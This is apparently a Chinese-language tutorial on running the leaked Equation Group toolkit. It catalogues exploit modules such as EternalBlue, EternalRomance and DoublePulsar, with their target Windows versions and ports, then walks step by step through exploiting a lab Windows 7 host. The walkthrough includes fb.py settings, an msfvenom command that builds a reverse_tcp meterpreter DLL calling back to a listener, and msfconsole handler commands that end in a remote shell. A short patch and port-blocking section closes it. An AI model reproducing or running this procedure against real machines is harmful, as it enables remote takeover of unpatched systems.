方程式EQGRP_Lost_in_Translation工具利用方法
北京时间4月14号晚,TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group(为NSA提供服务专门对国外进行间谍活动的组织)的黑客工具包。有网友在github上传了相关的解密后的文件,通过简单的分析所有的解密后的文件,发现其中包括新的23个黑客工具。具体请考:https://github.com/misterch0c/shadowbroker/blob/master/file-listing
这些黑客工具被命名为OddJob,EasyBee,EternalRomance,Eternalchampion,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等
Start.jar //图形界面
ExplodingCan 是 IIS 6.0 远程漏洞利用工具
EternalRomance 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
ErraticGopher 、Eternalblue 、Eternalsynergy 、Eternalchampion 、Educatedscholar、 Emeraldthread 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。
Esteemaudit 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。
Eclipsedwing 是 Windows 服务器的远程漏洞利用工具。
Eskimoroll 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。
FuzzBunch 是一个类似 MetaSploit 的漏洞利用平台。
OddJob 是无法被杀毒软件检测的 Rootkit 利用工具。
| 模块 | 漏洞 | 影响系统 | 默认端口 |
| ExplodingCan | IIS6.0远程利用漏洞 | Windows Server 2003 | 80 |
| EternalRomance | SMBv1漏洞(MS17-010)和 NBT漏洞 | Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2 | 139/445 |
| ErraticGopher | RPC漏洞 | Windows XP SP3, Windows 2003 | 445 |
| Eternalblue | SMBv2漏洞(MS17-010) | Windows XP(32),Windows Server 2008 R2(32/64),Windows 7(32/64) | 139/445 |
| Eternalsynergy | SMB和NBT漏洞 | Windows 8, Windows Server 2012 | 139/445 |
| Eternalchampion | SMB和NBT漏洞 | Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2, 2012, Windows 8 SP0 | 139/445 |
| Educatedscholar | MS09-050漏洞 | Windows vista, 2008 | 445 |
| Emeraldthread | SMB和NBT漏洞 | Windows XP, 2003 | 139/445 |
| Esteemaudit | RDP漏洞 | Windows XP, Windows Server 2003 | 3389 |
| Eclipsedwing | MS08-067漏洞 | Windows 2000, XP, 2003 | 139/445 |
| Eskimoroll | kerberos漏洞 | Windows 2000, 2003, 2003 R2, 2008, 2008 R2 | 88 |
|
Doublepulsar |
SMB和NBT漏洞 | Windows XP(32), Vista, 7, Windows Server 2003, 2008, 2008 R2 | 139/445 |
| Zippybeer | SMTP漏洞 | 445 | |
| Englishmansdentist | SMTP漏洞 | 25 | |
| Ewokfrenzy | IMAP漏洞 | IBM Lotus Domino 6.5.4, 7.0.2 | 143 |
| Emphasismine | IMAP漏洞 | IBM Lotus Domino 6.5.4, 6.5.5, 7.0, 8.0, 8.5 | 143 |
| Easypi | IBM Lotus Notes漏洞 | Windows NT, 2000 ,XP, 2003 | 3264 |
| Easybee | MDaemon WorldClient电子邮件服务器漏洞 | WorldClient 9.5, 9.6, 10.0, 10.1 |
安装部署
- 下载 python2.6 并安装,注意,必须安装32位python2.6相关版本,其他版本不奏效。
- 下载 pywin32 并安装
- 将 C:\Python26 添加到环境变量 PATH 中。将windows\lib\x86-Windows | x64-Windows 加入到系统环境变量
- 将 EQGRP_Lost_in_Translation 下载到的文件解压,找到 \ windows\fb.py,将,下图中两个部分注释掉。
然后运行 python fb.py 就可以执行了。
NSA 漏洞利用框架视频过程:
链接: http://pan.baidu.com/s/1hszHQk8 密码: jqi9
可以用msf生成shellcode,payload那里执行run shellcode就可以反弹。成功反弹截图
拿到exp,测了下
所需环境如下:一,攻击机1(32位系统,py2.6版本,pywin32) 二,攻击机2(linux带msf就好)
windows目录下新建listeningposts目录,空的就好(是exp下的windows目录,不是C盘下的windows目录)
不需要注释文件
执行python fb.py
可看到如下页面
利用步骤
在靶机1(192.168.71.133)中安装好python、pywin32以及NSA工具,在
C:\shadowbroker-master\windows 中执行fb.py:
分别设置攻击IP地址192.168.199.107,回调地址192.168.71.133(攻击机1),关闭重定向,设置日志路径,新建或选择一个project:
接下来输入命令:
useETERNALBLUE
依次填入相关参数,超时时间等默认参数可以直接回车:
由于靶机是win7 系统,在目标系统信息处选择1:win72k8r2
模式选1:FB
确认信息,执行
成功后,接着运行use Doublepulsar:
并依次填入参数,注意在function处选择2,rundll
同时在攻击机2 kali的msfvenom 生成攻击dll:
msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll
接着执行:
$ msfconsole
msf > useexploit/multi/handler
msf > set LHOST192.168.71.130
msf > set LPORT 5555
msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp
msf > exploit
同时将生成的go.dll上传到攻击机1(192.168.71.133),回到攻击机1,填入攻击dll路径:
接下来一路回车,执行攻击
回到kali,获得shell,攻击成功:
修复方案
1.临时规避措施:关闭135、137、139、445,3389端口开放到外网。推荐使用安全组策略禁止135.137.139.445端口;3389端口限制只允许特定IP访问。
2.及时到微软官网下载补丁升级,微软官方公告连接:
https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
微软已经发出通告 ,强烈建议用户更新最新补丁:
MS17-010 : 严重 - Microsoft Windows SMB 服务器安全更新 (4013389)
https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
MS14-068 :严重 - Kerberos 漏洞可能允许特权提升 (3011780)
https://technet.microsoft.com/library/security/MS14-068
MS10-061:严重 - 打印后台程序服务中的漏洞可能允许远程执行代码
https://technet.microsoft.com/library/security/ms10-061
MS09-050 :严重 - SMBv2 中的漏洞可能允许远程执行代码 (975517)
https://technet.microsoft.com/library/security/ms09-050
MS08-067 :严重 - 服务器服务中的漏洞可能允许远程执行代码 (958644)
https://technet.microsoft.com/library/security/ms08-067
